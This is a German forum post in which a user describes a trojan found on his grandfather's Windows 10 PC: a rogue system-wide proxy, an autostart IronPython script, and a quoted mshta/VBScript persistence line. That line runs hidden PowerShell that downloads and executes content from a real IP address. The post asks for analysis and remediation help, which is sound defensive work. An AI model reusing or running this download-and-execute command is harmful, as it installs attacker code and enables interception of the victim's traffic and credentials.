| |
| |||||||
Mülltonne: sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im AutostartWindows 7 Beiträge, die gegen unsere Regeln verstoßen haben, solche, die die Welt nicht braucht oder sonstiger Müll landet hier in der Mülltonne... |
28.05.2021, 11:23
| #1 |
| |  sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart Hallo Leute, ich wollte mal fragen, ob mir jemand ein paar Einblicke in einen gefundenen Trojaner geben kann, z.B. wie man sowas zukünftig findet, verhindert, was der Trojaner abgefischt haben könnte, ob es ein bekannter Trojaner oder was vollkommen anderes ist, ... . Mein Grund ist einfach nur Interesse/Wissensdurst: Hintergrund: Mein Opa bat mich um Hilfe, weil er keine Internetseiten mehr öffnen konnte und seit heute ständig eine Zertifikatsmeldung nervte. Drei merkwürdige Dinge habe ich auf seinem Windows 10 Rechner gefunden: 1.) In den Windows-Einstellungen war ein systemweiter Proxy eingestellt: Code:
ATTFilter http=localhost:8000;https=localhost:8000
Code:
ATTFilter mshta.exe --> vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell Invoke-Expression -Command:(wget -uri 185.141.27.215/gate990.php -method post -body cMgEfr65 -UseBasicParsing).content"", 0 : window.close")
3.) via Autostart-Ordner wurde eine ctfmon.exe gestartet, welche sich mit vielen anderen Dateien im %Appdata%-Unterordner 4FZBwVTf befand. Allerdings ist dies nur eine umbenannte Datei, denn tatsächlich handelt es sich hierbei um IronPython v2.7.11. Damit wurde ein base64-kodiertes Python-Script (update.phy) ausgeführt, dessen Inhalt habe ich am Ende eingefügt. Mit dessen Dekodierung bin ich leider gescheitert, denn da kam bei mir nur Bytecode raus und bin daher mit meiner Detektivarbeit am Ende meines Wissens. Fazit: Virenscanner oder VirusTotal.com springen natürlich nicht an und damit läuft das Teil vollkommen unter dem Radar. Zum Glück hat die o.g. Vertrauensabfrage für das Verisign-Stammzertifikat alle 5 Minuten auf sich aufmerksam gemacht. Hätte mein Opa diesem Stammzertifikat einfach genervt zugestimmt, dann hätten vermutlich monatelang Daten über den lokalen Proxy vollkommen unbemerkt abgesaugt werden können?!? nun zu meinen Fragen und zum Grund meiner Forumanfrage: - kann mir jemand tiefere Einblick in die Hintergründe diese Trojaner geben, z.B. - indem jemand den base64-code dekodiert und dann dessen Zweck versteht - wie konnte der systemweite Proxy so leicht eingetragen werden? - ist diese Malware schon länger bekannt, vielleicht in abgewandelter Form - wie könnte man einen Virenscanner dazu bringen eine Warnung auszugeben, der base64-code scheint jedenfalls zu gut getarnt oder unverdächtig zu wirken - was soll ich meinem Opa zukünftig raten, um derartige Maleware nicht auf den Rechner zu bekommen? - wie soll er sich jetzt nach dem Befall verhalten? Ich habe ihm schon mal geraten vorsichtshalber alle wichtigen Online-Passwörter zu ändern Den Inhalt der Datei update.py findet Ihr nachfolgend. Den gesamten Ordner unter %AppData% mit IronPython und allen Script-Dateien kann ich bei Bedarf gern zur Verfügung stellen. |
| Themen zu sachdienliche Hinweise erwünscht: systemweiter Proxy unter Win10, IronPython-Script im Autostart |
| a.exe, appdata, autostart, bat, befall, code, dateien, folge, frage, internetseite, localhost, maleware, malware, proxy, rechner, scan, seite, seiten, trojaner, vbscript, virus, warnung, win, windows, öffnen |
Baum-Darstellung